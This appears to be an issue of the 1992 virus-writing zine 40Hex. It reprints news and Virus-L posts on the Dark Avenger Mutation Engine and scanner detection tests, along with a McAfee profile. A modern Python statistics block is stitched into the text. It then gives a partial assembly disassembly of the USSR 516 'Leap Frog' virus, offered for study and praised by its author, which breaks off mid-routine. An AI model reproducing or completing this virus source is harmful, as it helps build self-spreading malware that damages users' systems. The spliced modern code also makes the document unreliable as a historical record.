40Hex Number 7 Volume 2 Issue 3                                       File 005

    Well, by far the most incredible creation that has surfaced in the virus
community is the MtE.  We aren't going to go into details about it, but
we are definitely going to give you as much news as we have collected.

In this file:

Article 1:   A note from Vesselin Bontchev
Article 2:   Steve Gibson tells us how to avoid polymorphic viruses
Article 3:   An article from Newsday about McAfee
Article 4:   NIST Expert Warns Feds to Find Better Ways to Head Off Viruses
Article 5:   Some messages posted on Smartnet about MtE


<<<<<<<<<<
Article 1:
<<<<<<<<<<

====From the Virus-L Digest via NIST=====
Date:    10 Feb 92 20:40:23 +0000
From:    bontchev@fbihh.informatik.uni-hamburg.de (Vesselin Bontchev)
Subject: Re: DAV/Sourcer/Rape (PC)

RUTSTEIN@HWS.BITNET writes:

> First, has anyone heard about Dark Avenger's latest?  I got a report
> secondhand last week that he'd come up with a new gem...I believe the
> report came from a researcher in the UK.  Fridrik/Vesselin/others, can
> you confirm/deny this report?

Yeah, I can confirm it... :-( And it is first-hand information,
since I have it. The long-rumored Mutating Engine is real and is
circulated to several virus exchange BBSes... :-(( The bad news is
that the damn thing really mutates, no kidding! It comes as an OBJ
file, which is supposed to be linked to any virus, with a detailed
do-it-yourself guide, and with a demo virus. The demo virus is in
source, but the source of the Mutating Engine (called MtE) is not
provided. According to the docs, what we have is version 0.90-beta of
the MtE, but version 0.91 is also known to exist... I'm wondering what
will be implemented more in version 1.00... :-(((

The damn thing is really difficult to crack! I mean, it contains no
encryption or anti-debugging and anti-disassembling techniques, but
it mutates too well... I have observed changing of encryption
algorithms, random bytes padding, usage of different ways to express
one and the same algorithm (yeah, that's right - different ways, not
just modifying the opcodes and inserting do-nothing instructions)...
The currently most mutating virus (V2P6Z) is a toy compared to it...

The worst of all is that just anybody can sit and use it to create a
virus. Well, some experience in assembly language programming is
needed, so the kids from RABID, NukE, and the other punk virus writing
groups that used to write overwriting viruses in high-level languages
will have a little bit of trouble learning how to use it... But a very
little bit!

Currently there are only two viruses, which use the MtE. The first is
the demo virus in the package (a silly, non-resident, COM file
infector, infects only the files in the current directory), and a
virus, called Pogue, which has been available on some VX BBSes in the
USA. McAfee's SCAN 86-B claims to be able to detect the Pogue virus.
Unfortunately, I haven't had the time to verify this (I received the
virus just two days ago). There are reports that in fact not all
possible variants of the virus are detected. SCAN 86-B DOES NOT detect
the MtE for sure - I tested it on the demo virus supplied with the
package.

As a conclusion, don't panic. Currently there are only two viruses
using the MtE and both are too silly to pose a serious threat. Copies
of the MtE have been provided to several anti-virus researchers (no,
don't write me to ask for a copy, you won't get one), including McAfee
Associates, Fridrik Skulason, Dr. Solomon, etc., so there are a lot of
people working right now on the problem. The good news is that once we
learn to recognize the MtE, we'll be able to detect -any- new viruses
that are using it.

Oh, yes, just out of interest. The whole package comes in a neat ZIP
archive, with -AV code for "CrazySoft, Inc.". The Bulgarian hackers
have demonstrated again that the -AV authenticity verification in
PKZIP is just crap, so PLEASE DO NOT RELY ON IT!


<<<<<<<<<<
Article 2:
<<<<<<<<<<

From InfoWorld Magazine
Tech Talk
by Steve Gibson

AT LAST, HOW TO PROTECT YOURSELF FROM POLYMORPHIC VIRUSES

  My past two columns concerning the threat presented by polymorphic
viruses triggered an informative conversation with the industry's
chief virus researcher, John McAfee. During that conversation I
learned that things are even worse than I'd supposed.
  It turns out that the "Dark Avenger" bulletin board system, which
disseminates virus code, has recently published source code for the
Dark Avenger Mutation Engine. The Mutation Engine is nothing less than
a first-class code kernel that can be tacked onto any existing or
future virus to turn it into a nearly impossible to detect
self-encrypting virus.
  My examination of a sample virus encrypted by the Mutation Engine
provided by McAfee revealed alarming capabilities. Not only do the
Dark Avenger Mutation Engine viruses employ all of the capabilities I
outlined in last week's column, but they also use a sophisticated
reversible encryption algorithm generator.
  The Mutation Engine uses a meta-language-driven algorithm generator
that allows it to create an infinite variety of completely original
encryption algorithms. The resulting unique algorithms are then salted
with superfluous instructions, resulting in decryption algorithms
varying from 5 to 200 bytes long.
  Because McAfee has already received many otherwise known viruses
that are now encapsulated with the Mutation Engine's polymorphic
encryption, it's clear that viruses of this new breed are now
traveling among us.
  It is clear that the game is forever changed; the sophistication of
the Mutation Engine is amazing and staggering. Simple pattern-matching
virus scanners will still reliably detect the several thousand
well-known viruses; however, these scanners are completely incapable
of detecting any of the growing number of viruses now being cloaked by
the Dark Avenger Mutation Engine.
  So what can we ultimately do to thwart current and future software
viruses? After brainstorming through the problem with some of our
industry's brightest developers and systems architects, I've reached
several conclusions.
  First, scanning for known viruses within executable program code is
fundamentally a dead end. It's the only solution we have for the
moment, but the detectors can only find the viruses they are aware of,
and new developments such as the Mutation Engine render even these
measures obsolete.
  Second, detecting the reproductive proclivities of viruses on the
prowl is prone to frequent false alarms and ultimately complete
avoidance. With time the viruses will simply circumvent the detectors,
at which time the detectors will only misfire for self-modifying
benign programs.
  Third, the Achilles' heel of our current DOS-based PC is its
entirely unprotected nature. As long as executable programs (such as
benign and helpful system utilities) are able to freely and directly
access and alter the operating system and its file system, our
machines will be vulnerable to deliberate attack.
  So here's my recommendation.
  Only a next-generation protected-mode operating system can enforce
the levels of security required to provide complete viral immunity. By
marking files and code overlays as "read and execute only" and by
prohibiting the sorts of direct file system tampering performed by our
current crop of system utilities, such operating systems will be able
to provide their client programs with complete viral immunity.
  The final Achilles' heel of a protected-mode operating system is the
system boot process, before and during which it is still potentially
vulnerable. By changing the system ROM BIOS' boot priority to favor
hard disk over floppy, this last viral path can be closed and blocked
as well.

(Steve Gibson is the developer and publisher of SpinRite and
president of Gibson Research Corp., based in Irvine, California....)


<<<<<<<<<<
Article 3:
<<<<<<<<<<

Date:    Mon, 06 Apr 92 14:18:09 -0400
From:    Joseph Halloran
Subject: NY Newsday Article on McAfee & Viruses

     (NOTE: The following article was published as a whole in the
April 5, 1992 edition of New York Newsday, page 68.  It is reprinted
below without the express consent of Joshua Quittner, New York Newsday,
or the Times-Mirror Company)

                        SOFTWARE HARD SELL
                        ------------------
          "Are computer viruses running rampant, or is
           John McAfee's antivirus campaign running amok?"
                                 -By Joshua Quittner, staff writer

    John McAfee is doing one of the things he does best: warning a
reporter about the perils of a new computer virus.
    "We're into the next major nightmare -- the Dark Avenger Mutating
Engine," McAfee says, ever calm in the face of calamity.  "It can
attach to any virus and make it mutate."  The ability to "mutate"
makes it virtually undetectable to antivirus software, he explains.
    "It's turning the virus world upside down."
    But wait.  This is John David McAfee, the man who once ran a service
that revolved around the curious premise that, if you paid him a membership
fee and tested HIV-negative, you could have AIDS-free sex with other
members for six months.  This is the man who jumped from biological
viruses to computer viruses and quickly became a flamboyant expert on the
new demi-plague, showing up at the scene of infected PCs in his Winnebago
"antivirus paramedic unit."
     And this is the same man who started something called the Computer
Virus Industry Association, and, as chairman, made national headlines
last month by saying that as many as _five million_ computers might be
infected with a virus named Michelangelo.
     The virus turned out to be a dud, in the opinion of many industry
experts.  But not before McAfee became a media magnet: In the weeks
before March 6, when Michelangelo was supposed to erase the hard disks of
infected IBM and compatible PCs, he was featured by Reuters, the
Associated Press, USA Today, the Wall Street Journal, "MacNeil/Lehrer
News Hour," CNN, "Nightline," National Public Radio and "Today."
     What some news reports failed to point out, however, is that McAfee
is also the man who runs Santa Clara, Calif.-based McAfee Associates,
a leading manufacturer of antivirus software, and that he stood to
benefit from publicity about Michelangelo.  McAfee won't reveal sales,
but it seems clear they shot up during the two-week frenzy.
     "People kept saying I hyped this, I hyped this," said McAfee, who
still defends the notion that Michelangelo was widespread.  "I never
contacted the press -- they called me."
     McAfee's detractors say the Michelangelo scare was mainly hype and
media manipulation, a parade in which most of the floats were built by
McAfee.  They say McAfee helped drive the rush to buy antivirus
software -- with his products poised to sell the most -- while boosting the
profile of McAfee Associates, a company that recently received
$10 million from venture capitalists McAfee says are waiting to sell
stock publicly.
     And, critics say, while McAfee touts a recent evaluation that rated
his software alone as 100 percent effective in finding virtually every
known virus, he funded the evaluation and picked his competitors.
     "He does know the issue of viruses, no doubt about it," said Ken
Wasch, executive director of the 900-member Software Publishers
Association.  "But his tactics are designed to sell _his_ software."
     McAfee says the media consistently misquoted him about how
widespread Michelangelo was.  And his company didn't profit from the
virus, he says, but actually suffered due to the free advice his staff
was dispensing.  "It does not benefit me in any way or shape or form
to exaggerate the virus problem."
    Even McAfee's detractors admit his programs do what they're supposed
to do: track down coding that's maliciously placed in software to make it
do anything from whistle "Yankee Doodle" to erase valuable data.
    His strongest distribution channel is shareware, a kind of software
honor system common on electronic bulletin boards.  PC users can download
the programs over phone lines and pay later if they find them useful.
    McAfee's programs are "probably the most popular shareware programs
of all time, second only to PKZIP," which compresses data, said George
Pulido, technical editor of Shareware Magazine.  He said McAfee's
programs have been copied by millions of people, although only about 10
percent of shareware users actually pay.
    A more reliable money-maker is corporate site licenses, where McAfee
is one of the three biggest players.  Michael Schirf, sales manager of
Jetic Inc., a Vienna, Va., company that is McAfee's sales agent for the
Mid-Atlantic region, claimed more than 300 of the Fortune 500 companies
have licensed his software, paying $3,250 to $20,000, depending on the
number of PCs.  During the Michelangelo scare, "you couldn't get through
to us at one point because of people asking about it and trying to get
it," Schirf said.
    Certainly, McAfee's software wasn't the only antivirus software
selling.  Fueled by giveaways of "special edition" programs that scanned
exclusively for the Michelangelo virus, sales of general antivirus
packages were a bonanza for everyone in the business, including Norton/
Symantec and Central Point Software, two other leading sellers.
    "Our sales of antivirus software were up 3,000 percent," said Tamese
Gribble, a spokesman for Egghead Software, the largest discount software
retailer in the country.  "We were absolutely swamped."
    Rod Turner, a Norton executive vice president, said antivirus sales
increased fivefold.  "We didn't make any product in advance," he said,
"so we were caught with our pants down."  Companies like Norton that
sell factory-shipped software couldn't ramp up quickly enough to take
full advantage of the situation.  But McAfee's software comes mostly
through electronic bulletin boards and sales agents, giving him a nearly
limitless capability to meet demand.  "I can supply as many copies of the
software as I have blank diskettes to put it on," Schirf said.
    The Michelangelo scare was also good for pay-by-the-hour on-line
information services such as Compuserve, which saw a huge increase in the
time users logged on looking for advice on Michelangelo.
    Indeed, a virus forum on Compuserve was hugely popular, with users
downloading antivirus programs, including McAfee's, 49,000 times that
week, Compuserve spokesman Dave Kishler said.  Compuserve made more than
$100,000 from the online time.
    McAfee makes an attractive industry spokesman.  Tall and lean, with a
mellifluous voice, he speaks in perfect sound bites -- an antidote to the
unquotably bland men who otherwise dominate the antivirus business.
    A mathematician who got into programming when he graduated from
Roanoke College, McAfee, 47, said he has held a dozen jobs, ranging from
work on a voice-recognition board for PCs to consulting for the Brazilian
national phone company in Rio de Janeiro.  His first mention in the media
was in connection with the American Association for Safe Sex Practices, a
Santa Clara club formed so that its members could engage in AIDS-free
sex.  For a $22 fee, members whose blood tested HIV-negative were given
cards certifying them AIDS-free, buttons saying "Play it Safe," and were
entered on McAfee's on-line data base.  Updates, every six months, cost
$7.
    Anyone who knows anything about AIDS knows a certificate that someone
is AIDS-free is good only until the person has sex with or shares an
intravenous needle with an infected person.
    When asked now about the safe-sex group, McAfee at first denied
anything but a passing affiliation: "I worked for those people as a
contractor," he said, adding, "It was not my company."  But later, when he
was reminded that both the San Diego Tribune and the San Francisco
Chronicle described him in feature stories as the entrepreneur who
started the organization ("I believe I am providing an environment
where people who are sexually active can feel more safe and secure,"
he told the Tribune in a March 9, 1987, story), McAfee sidestepped the
ownership question.  He said the group performed a valuable function,
maintaining a data base on AIDS and information about the disease.
    "I thought they were pretty well ahead of their time," he said,
quickly locating a 1987 newsletter put out by the group, which featured
articles such as "Kissing and AIDS" and "The Apparent Racial Bias of the
AIDS Virus."
    The association no longer exists.  "They came and went pretty fast,"
McAfee said, chuckling.
    McAfee got his first taste of computer viruses at around that time.
"It was an accident, like anything else in life," he recalled.  "I got
a copy of the Pakistani Brain.  I think I got it from one of the local
colleges.  It was the program of the year."  The program, reportedly
written by two Pakistani students trying to foil software pirates,
destroyed some PC data.
    By 1989, McAfee was a virus expert, selling the first antivirus
software and offering to make house calls with his Winnebago cum computer
lab.
    "John's antivirus unit is the first specially customized unit to wage
effective, on-the-spot counterattacks in the virus war," McAfee and a
co-author reported in "Computer Viruses, Worms, Data Diddlers, Killer
Programs, and Other Threats to Your System," their 1989 book.
"Eventually, there will be many such mobile search, capture and destroy
antivirus paramedic units deployed around the world."
    He had also founded the Computer Virus Industry Association, with
himself as chairman.
    "The CVIA is nothing more than McAfee," said Wasch, of the Software
Publishers Association.  "I had a run-in with him three years ago about
that."  Wasch said he had been asked by other antivirus businesses to
look into McAfee's group after claims surfaced that he was railroading
companies into joining -- something McAfee vigorously denies.  Wasch
said he believes the association was a self-serving group that did
little more than support McAfee's business.
    "It would be like Microsoft creating the Windows Support Association
as a front to promote its Windows software," Wasch said.
    McAfee denies the CVIA is a front and said Wasch's group was
threatened by the creation of the virus association.  "They wanted to
take us over," he said.  In any event, he said, the association is now
managed by others and his involvement is minimal, adding, "It's more of
a nuisance to me."  But he does say the association is dependent on his
private business for much of its virus data.  "McAfee Associates has all
the numbers," he said.
    Detractors say McAfee now uses another association to hype his
programs.
    The National Computer Security Association released one of the few
ratings of antivirus software, with McAfee's program on top -- a
comparison he's quick to cite.  But that may be because he influenced
which software would be compared with his and how the tests were run,
said David Stang, who founded the for-profit association in Washington,
D.C., two years ago.  Stang recently left the association and started
a new one after a falling-out with McAfee over testing procedures.
    Stang said one of the association's functions was to "certify"
antivirus software -- to test and rate competing programs.  "It was his
[McAfee's] idea that we certify products," Stang said.  And when no
company rushed forward to pay $500 to have its software rated, McAfee
"sent me the products and the check and said 'go certify.'"
    McAfee says he spent thousands of dollars to evaluate some of his
competitors' programs.  In February, 1992, in fact, he paid for his own
and the other five programs to be certified.  His was ranked 100 percent
effective.  The others ranged from 44 percent to 88 percent effective.
    "If your product competes with mine, I'd like for those customers of
mine to know that your product isn't as good as mine," he said.  But in
the February certification, notably absent were McAfee's biggest
competitors: Dr. Solomon's ToolKit and Skulason's F-Prot.
    "I've got 75 competitors.  I pick the ones who are going to give me
the most trouble that month," McAfee explained.
    The February evaluation was actually a second, and more favorable
test, that Stang says he performed at McAfee's request.  Stang said
McAfee was dissatisfied with the association's methods -- it tested the
software against a "library" of viruses that McAfee thought wasn't
comprehensive enough.  So Stang said he agreed to use a new library that
he claims was built on viruses McAfee found and supplied.  Scores for
McAfee's program rose while some others dropped sharply.  McAfee said
Stang's virus library was incomplete and his testing methods
"wishy-washy," and he defended the new library's independence.
    "This is not something that anybody, let alone me, could mess with,"
said McAfee.  "You can't jimmy these scores.  You can't say that McAfee
buys more certifications, therefore he'll get a better score, because
other vendors would complain."
    "They wouldn't let me get away with it."

[John McAfee]


<<<<<<<<<<
Article 4:
<<<<<<<<<<

From: Government Computer News
      March 30, 1992
By:   Kevin Power, GCN staff

"NIST Expert Warns Feds to Find Better Ways to Head Off Viruses"

BALTIMORE - In the wake of the Michelangelo scare, a top security
expert with the National Institute of Standards and Technology has
warned agencies against relying too heavily on virus scanning
software.
  Anti-virus software is a useful detection tool, but it often takes
too long to use and does not solve fundamental problems, said Dennis
Steinhauer, manager of the computer security evaluation group at
NIST's Computer Systems Laboratory. He spoke at the March meeting of
the National Computer System Security and Privacy Advisory Board.
  Steinhauer said the fallout from Michelangelo was minimal, thanks to
early detection, plenty of publicity and governmentwide [sic]
warnings. But he also stressed that vendors and agencies need more
effective methods of protecting against viruses in newly acquired
hardware and software.
  "What were believed to be reliable channels may no longer be," he
said. "There's a lot that needs to be done to make sure that users
receive better assurances that products are not contaminated. This
incident may have undermined consumer confidence."
  Steinhauer said one solution would be to build hardware and
operating systems that are less vulnerable.
  For example, vendors can isolate the boot sector of a hard drive to
guard against infection. But agencies tend to shy away from such
serious measures, because they force managers to make hard choices about
system functionality and user requirements, Steinhauer said.
  "We have the technology to do what is necessary. But we don't know
what the price is to the user," he said. "The question is whether I'm
willing to have my machine hobbled for protection. It's similar to
installing a governor on a car to limit a vehicle's speed to 55 miles
per hour."
   Agencies still are surveying for possible damage inflicted by
Michelangelo, Steinhauer said. But he said the incident showed NIST
officials that more agency computer emergency response teams (CERTs)
are needed.
  CERTs, established in some agencies for just such attacks, worked
well, Steinhauer said. The teams coordinate their work through the
Forum on Incident Response and Security Teams, or FIRST.
  But Steinhauer said it was evident that not enough agencies have
established CERTs.
  Internal agency security teams did their jobs, but the government
needs a better way to distribute security advisories and handle
less-publicized emergencies, Steinhauer said.


<<<<<<<<<<<
Article 5A:
<<<<<<<<<<<

Date: 05-29-92 (21:06)              Number: 3019 of 3059 (Echo)
  To: BILL LAMBDIN                  Refer#: NONE
From: CHARLIE MOORE                   Read: NO
Subj: POLYMORPHIC VIRUSES   1/2     Status: PUBLIC MESSAGE
Conf: VIRUS (52)                 Read Type: GENERAL (+)

Note: This message is a repost -- I tied up the first by failing
      to set the lines per message < 99.  My apologies to all.

Bill, regarding how McAfee's Scan detects the DAME you stated:

BL>Trust me. It is still string searches. McAfee finds those three
BL>bytes, and then follows the steps to decrypt the virus to memory. If
BL>it continues long enough to positively identify the DAME, Scan
BL>reports the virus, and looks at the next

Now, being in the security business, and probably a bit paranoid as a
result, when I see or hear "Trust me", I get a little queasy. I don't
know the source of your information Bill (perhaps you'll let us know)
but I don't think it's correct.

On May 11, 1992, McAfee Associates was featured in a news release about
the DAME -- Dark Avenger Mutation Engine No Threat to Protected PCs.
Below is a quote from this release that does not track with what you're
telling me (BTW, it was McAfee Associates who sent me the news
release -- did not see it until today though).

     The Mutation Engine, however, uses a special algorithm to
     generate a completely variable decryption routine each time.
     "The result is that no three bytes remain constant from one
     sample to the next," said Igor Grebert, senior programmer at
     McAfee Associates.  "This makes detection using conventional
     string-matching techniques impossible."

Now, in my last message to you I stated that I understood three bytes
did remain constant (I got this info from two sources: Hoffman's Vsum204
and tech support at Fifth Generation Systems -- I now suspect Hoffman is
wrong and tech support at Fifth Generation Systems was probably just
parroting Hoffman's Vsum).  As I've stated before, solid technical
information about the DAME is limited!

Today, I called Igor Grebert at McAfee Associates to verify that he was
properly quoted in the news release -- he was.  Igor would not tell me
in detail how McAfee's Scan detects the DAME; however, he did assure me
that searching for a three-byte string was not the technique used.

BL>CM> I don't think anyone, not even the Dark Avenger himself, can put an
BL>CM> accurate number on the possible virus mutations generated by the

BL>Again trust me. It is mathematics pure and simple.

BL>the DAME randomly picks a 32 bit seed. Each bit will either be a 1 or 0.
BL>... according to my scientific calculator, or 4.3 billion possible
BL>combinations in English.
BL>If the numbers above ring bells, it is binary plain and simple.

Well Bill, I'm certainly not going to argue with your calculator. :-)

However, my point was, and remains, that the possible numbers associated
with a random seed are not necessarily equal to the possible number of
mutations the DAME is capable of generating.  Now, as I stated to you
in my original message, solid information on the DAME (in particular,
how it works interactively with its various segments of code) is
limited.  Even the most experienced and best qualified researchers
often don't agree on certain aspects and more than a few questions
remain about the limits of variability and related issues.

Below is the latest and best info I've seen that gives some insight
into the complexity here.  The message was posted on the Internet's
Virus-L Conference; its author, Vesselin Bontchev, is one of the
most highly respected virus researchers in the world.

Date:    21 May 92 22:11:43 +0000
From:  bontchev@fbihh.informatik.uni-hamburg.de (Vesselin Bontchev)
Subject:  Detecting the MtE (PC)

Almost half a year has passed since the Dark Avenger's Mutating
Engine (MtE) has been made available to the anti-virus researchers.
Currently several scanners claim to detect it with "100 %
reliability". Do they really succeed however?

We decided to run some tests at the VTC. The tests are preliminary and
were performed by Morton Swimmer. The Fear virus was used (a minor
Dedicated patch) to generate 9,471 infected files. The files were
generated by the natural infection process - the reason was to also test
the randomness of the random number generator supplied with the MtE. Of
those 9,471 infected examples 3 turned out to be duplicates, which
yielded 9,468 different instances of the virus. It also means that the
random number generator is rather good...

Those examples filled a 40 Mb disk (which didn't permit us to generate
10,000 different examples, as we wished initially). We wanted to keep
them all, in order to be able to reproduce the tests.

Three scanners were run on those virus samples. The scanners were
the three that showed the best detection rate on our collection, namely
Dr. Solomon's FindVirus (version 4.15 with drivers from May 15, 1992),
Fridrik Skulason's F-Prot 2.03a, and McAfee's SCAN 89-B.

All three scanners failed the test, each in a different way.

FindVirus showed the worst results. It did not detect 744 virus
samples (7.86 %). F-Prot did not detect 13 examples (0.14 %). SCAN did
not detect 4 examples (0.04 %). SCAN shows the best detection rate in
the case of MtE, but we also got a report for one false positive.
For the average users the above rates might appear to be high enough.
What are 4 undetected infected files when almost 10,000 infected ones
have been properly detected? Well, it does matter. When you are
looking for a particular known virus, anything below 100 % detection
means that your program fails to detect it reliably. Remember that a
single undetected file may restart the epidemic.

There is another thing to be concerned about. The MtE uses a 128-byte
random number generator, which means that theoretically it can exist
in 2^512 different variants. And 0.04 % of this is still quite a

CM>   [Hmm...  yet a different number of possible mutations?]

lot... Suppose that some virus writer runs the same tests (or even
more elaborate ones) and determines for which values of the random
number generator the virus is not detected. Then he can create a new
random number generator (the MtE provides the possibility for
user-supplied random number generators to be plugged in), which
generates -only- those values... Such a virus will not vary a lot, but
it will still mutate and -all- its mutations will escape that
particular scanner...

As I mentioned in the beginning, those were only preliminary tests. We
intend to modify the random number generator so that it will generate
consecutive (instead of random) numbers and to create a few hundred
thousand mutations by keeping only those which a particular scanner
does NOT detect. We'll then re-run the tests for random ranges of
consecutive mutations. All we can say now is that none of the three
scanners mentioned above is able to detect MtE-based viruses with 100
% reliability.

Currently I am aware of the existence of at least three other scanners
which claim 100 % detection of the MtE. One comes with the new version
of V-Analyst III, the second has been designed by IBM, and the third
is a Dutch scanner. As soon as we get them we'll re-run the tests.

Regards,
Vesselin
----------------------End of Vesselin's Message----------------------

Bill, I'll follow up on the subsequent tests Vesselin intends to run and
report the results to you.

One thing I've learned in this business is that accurate and solid
information is sometimes hard to come by and the experts don't always
have all the answers.  Although I think Vesselin's above message is
pretty solid, I also think he fails to consider something:  on the one
hand, he states a theoretical 2^512 (in contrast, your number is 2^32)
different variants; yet, his empirical data produces 3 duplicate
mutations from a run of less than 10 thousand.  I think this is rather
odd from a statistical perspective.

Regards,
   Charlie Moore
---


<<<<<<<<<<<
Article 5B:
<<<<<<<<<<<

Date: 05-30-92 (15:08)              Number: 3021 of 3059 (Echo)
  To: BILL LAMBDIN                  Refer#: NONE
From: CHARLIE MOORE                   Read: NO
Subj: POLYMORPHIC VIRUSES           Status: PUBLIC MESSAGE
Conf: VIRUS (52)                 Read Type: GENERAL (+)

Bill, here's a followup post from Vesselin regarding the DAME:

-----------------Extracted from Internet's Virus-L--------------------

Date:    27 May 92 08:44:06 +0000
From:    bontchev@fbihh.informatik.uni-hamburg.de (Vesselin Bontchev)
Subject: Re: Detecting the MtE (PC)

bontchev@fbihh.informatik.uni-hamburg.de (Vesselin Bontchev) writes:

> MtE. Of those 9,471 infected examples 3 turned out to be duplicates,
> which yielded 9,468 different instances of the virus. It also means

Correction: a fourth duplicate has been found later. Therefore the
total number of generated different mutations used during the test is
only 9,467.

> Currently I am aware of the existence of at least three other scanners
> which claim 100 % detection of the MtE. One comes with the new version
> of V-Analyst III, the second has been designed by IBM, and the third
> is a Dutch scanner. As soon as we get them we'll re-run the tests.

We tried out the Dutch scanner. Its authors were present during the
test. When they saw the results, they decided that the program is not
ready to be tested yet and promised to send us a fixed version soon...
:-)

We just received the V-Analyst III scanner; we haven't tested it yet.
As soon as the test is performed, I'll post the results.

Meanwhile we received and tested yet another scanner which claims "100%
detection of the MtE-based viruses". It is a German product, called
AntiVir IV and produced by H+BEDV. The version tested was 4.03 of May
15, 1992, beta version. It missed 584 mutations (6.17 %).

Regards,
Vesselin
- --
Vesselin Vladimirov Bontchev           Virus Test Center, University of Hamburg
Tel.:+49-40-54715-224, Fax: +49-40-54715-226       Fachbereich Informatik - AGN
** PGP public key available by finger. **     Vogt-Koelln-Strasse 30, rm. 107 C
e-mail: bontchev@fbihh.informatik.uni-hamburg.de     D-2000 Hamburg 54, Germany
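The duplicate count in the two messages above (3, later corrected to 4, out of 9,471 generated samples) and the 6.17 % miss rate quoted for AntiVir IV can both be checked with a little birthday-paradox arithmetic. The Python below is an added illustration for this file; it is not part of either message and not a tool of the Virus Test Center. It assumes each mutation is an independent, uniform draw from the engine's output space, which is only an approximation (a mutation engine's output is not uniform, and what counts as a "duplicate" depends on how the test compared the samples), but it is enough to show why Charlie Moore finds the duplicates odd: neither a 2^512 nor a 2^32 space predicts any collision in under ten thousand draws, and the observed duplicates correspond to an effective space of roughly 2^23 for the generator as driven in that test. The two large figures describe how many decryptors the engine could produce, not how many a given random number generator actually reaches.

```python
import math

# Figures as reported in the messages above: 9,471 generated samples,
# 4 duplicates after the correction, 9,467 distinct mutations, and
# AntiVir IV 4.03 beta missing 584 of them.
SAMPLES = 9471
DUPLICATES = 4
DISTINCT = 9467
ANTIVIR_MISSED = 584


def expected_duplicate_pairs(n: int, space_bits: int) -> float:
    """Expected number of colliding pairs when n items are drawn uniformly
    and independently from 2**space_bits equally likely values.
    Birthday approximation C(n, 2) / N; accurate while n*n is far below N."""
    return n * (n - 1) / 2 / (2.0 ** space_bits)


def effective_space_bits(n: int, duplicates: int) -> float:
    """Invert the approximation: the uniform space size, in bits, for which
    `duplicates` colliding pairs would be the expected outcome of n draws.
    This is an estimate under the uniform-draw assumption, nothing more."""
    if duplicates <= 0:
        raise ValueError("need at least one observed duplicate")
    return math.log2(n * (n - 1) / (2 * duplicates))


def miss_rate_percent(missed: int, total: int) -> float:
    """Scanner miss rate as a percentage, rounded to two places as the
    message quotes it."""
    return round(100.0 * missed / total, 2)


def summarise() -> dict:
    """Run the page's numbers through the functions above."""
    return {
        # about 3e-147: in a 2^512 space a single duplicate would be astonishing
        "pairs_expected_2^512": expected_duplicate_pairs(SAMPLES, 512),
        # about 0.01: even the 2^32 figure predicts no duplicates in 9,471 draws
        "pairs_expected_2^32": expected_duplicate_pairs(SAMPLES, 32),
        # about 23.4 bits: the space size that would make 4 duplicates typical
        "effective_bits_for_observed": effective_space_bits(SAMPLES, DUPLICATES),
        # 6.17: the figure quoted for AntiVir IV
        "antivir_miss_percent": miss_rate_percent(ANTIVIR_MISSED, DISTINCT),
    }


if __name__ == "__main__":
    for key, value in summarise().items():
        print(f"{key:30s} {value:.6g}")
```

The "effective bits" figure is the useful defender-side number: it says how much variety a scanner's test corpus actually contains, which is what matters when someone claims 100 % detection on the strength of a generated sample set.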

40Hex Number 7 Volume 2 Issue 3                                       File 006

                         Virus Spotlite on: Leap Frog

It's always interesting to find new residency techniques.  I suppose everyone
by now is tired of the traditional high-memory loading routine and is on the
lookout for something different.  40Hex comes to the rescue!

This virus, the "Leap Frog" or USSR 516, has one of the most unique methods
I have ever seen.  I was mucking around in VSUM and noticed that, according
to Patricia, it "installs itself in a hole in memory between MSDOS and the DOS
Stacks."  She is, of course, not telling us the entire story.  Leap Frog
basically latches onto and resides in a DOS disk buffer.  I do not know who
the author is, but I commend him for his innovative technique.  I took the
liberty of disassembling the virus which is given below.  It should be an
exact byte-for-byte matchup of the original carrier file (or at least should
be extremely similar).  The offsets are in their correct locations, etc, etc.
It is simple to understand and terribly efficient.

Although the coding is tight, there are some inconsistencies.  For
example, I do not understand the purpose of the timing routine (int 21h/ah=30h)
in the code.  I also do not understand why the author decided to infect COM
files in such an abnormal way.  An interesting "feature" is the disabling of
Control-Break checking - a thoroughly unnecessary piece of code.  I believe
further that the line above "findmarker" should read:

                lds     di,dword ptr ds:[30h*4]

In any case, the code is otherwise very, very good.  It is great for studying
by newcomers and "oldtimers" alike.  Things to look for:
  Residency routine
  Lack of extensive use of relative offsets
  Use of stack frame in the interrupt handler
  Critical error handler

Enjoy!                                             Dark Angel of PHALCON/SKISM

ussr516         segment byte public
                assume  cs:ussr516, ds:ussr516
                org     100h
; Disassembled by Dark Angel of PHALCON/SKISM
; for 40Hex Number 7 Volume 2 Issue 3
stub:           db      0e9h, 0, 0
                db      0e9h, 1, 0, 0
; This is where the virus really begins
start:
                push    ax
                call    beginvir

orig4           db      0cdh, 20h, 0, 0
int30store      db      0, 0, 0, 0                     ; Actually it's int 21h
                                                       ; entry point
int21store      db      0, 0, 0, 0

beginvir:       pop     bp                             ; BP -> orig4
                mov     si,bp
                mov     di,103h
                add     di,[di-2]                      ; DI -> orig4
                movsw                                  ; restore original
                movsw                                  ; 4 bytes of program
                xor     si,si
                mov     ds,si
                les     di,dword ptr ds:[21h*4]
                mov     [bp+8],di                      ; int21store
                mov     [bp+0Ah],es
                lds     di,dword ptr ds:[30h*4+1]      ; Bug????
findmarker:
                inc     di
                cmp     word ptr [di-2],0E18Ah         ; Find marker bytes
                jne     findmarker                     ; to the entry point
                mov     [bp+4],di                      ; and move to
                mov     [bp+6],ds                      ; int30store
                mov     ax,5252h                       ; Get list of lists
                int     21h                            ; and also ID check

                add     bx,12h                         ; Already installed?
                jz      quitvir                        ; then exit
                push    bx
                mov     ah,30h                         ; Get DOS version
                int     21h

                pop     bx                             ; bx = 12, ptr to 1st
                                                       ; disk buffer
                cmp     al,3
                je      handlebuffer                   ; if DOS 3
                ja      handleDBHCH                    ; if > DOS 3
                inc     bx                             ; DOS 2.X, offset is 13
handlebuffer:
                push    ds
                push    bx
                lds     bx,dword ptr [bx]              ; Get seg:off of buffer
                inc     si
                pop     di
                pop     es                             ; ES:DI->seg:off buff
                mov     ax,[bx]                        ; ptr to next buffer
                cmp     ax,0FFFFh                      ; least recently used?
                jne     handlebuffer                   ; if not, go find it
                cmp     si,3
                jbe     quitvir
                stosw
                stosw
                jmp     short movetobuffer
handleDBHCH:   ; Disk Buffer Hash Chain Head array
                lds     si,dword ptr [bx]              ; ptr to disk buffer
                lodsw                                  ; info
                lodsw                                  ; seg of disk buffer
                                                       ; hash chain head array
                inc     ax                             ; second entry
                mov     ds,ax
                xor     bx,bx
                mov     si,bx
                lodsw                                  ; EMS page, -1 if not
                                                       ; in EMS
                xchg    ax,di                          ; save in di
                lodsw                                  ; ptr to least recently
                                                       ; used buffer
